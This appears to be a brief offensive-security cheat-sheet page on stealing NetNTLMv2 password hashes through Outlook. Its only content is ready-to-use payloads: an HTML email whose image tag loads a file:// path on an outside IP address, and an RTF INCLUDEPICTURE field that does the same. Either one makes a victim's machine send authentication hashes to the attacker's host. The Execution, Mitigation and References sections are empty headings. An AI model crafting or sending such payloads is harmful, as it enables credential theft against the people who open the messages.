NetNTLMv2 hash stealing using Outlook
Context
Weaponization
<html>
<h1>holla good sir</h1>
<img src="file://157.230.60.143/download.jpg">
</html>{\rtf1{\field{\*\fldinst {INCLUDEPICTURE "file://157.230.60.143/test.jpg" \\* MERGEFORMAT\\d}}{\fldrslt}}}


Execution
Victim View


Mitigation
References
Last updated